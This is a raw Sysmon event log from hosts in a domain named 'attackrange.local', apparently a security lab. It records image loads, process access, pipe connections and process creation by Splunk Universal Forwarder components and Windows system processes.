12:16:10.179{AD5E2759-5432-6143-0500-00000000F101}4122828C:\Windows\system32\csrss.exe{AD5E2759-5B0A-618E-05CE-08000000F101}5080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219414Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.179{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219413Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.179{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B0A-618E-05CE-08000000F101}5080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219412Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.165{AD5E2759-5B0A-618E-05CE-08000000F101}5080C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219442Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:11.883{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2559133CF4CBECE8FD4779B7A8D6E0FA,SHA256=D72BB3174BCAD6A8A3E1364EA4D236B311076068A61BD461953A68F175E44D05,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057345059Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.855{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057345058Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.855{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057345057Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.855{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057345056Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:11.855{8B6011A9-5B0B-618E-3EF3-04000000F101}6660\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057345055Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.855{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057345054Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:11.855{8B6011A9-5B0B-618E-3EF3-04000000F101}6660\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057345053Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.855{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057345052Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.855{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057345051Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.855{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057345050Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.855{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057345049Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057345048Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057345047Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057345046Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057345045Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057345044Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057345043Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057345042Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057345041Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057345040Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057345039Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057345038Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057345037Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057345036Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057345035Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057345034Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057345033Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057345032Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057345031Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057345030Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057345029Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057345028Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057345027Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057345026Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057345025Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057345024Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518FtrueMicrosoft WindowsValid 734700x800000000000000057345023Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057345022Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057345021Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057345020Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057345019Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057345018Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057345017Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:11.839{8B6011A9-5B0B-618E-3EF3-04000000F101}6660C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK 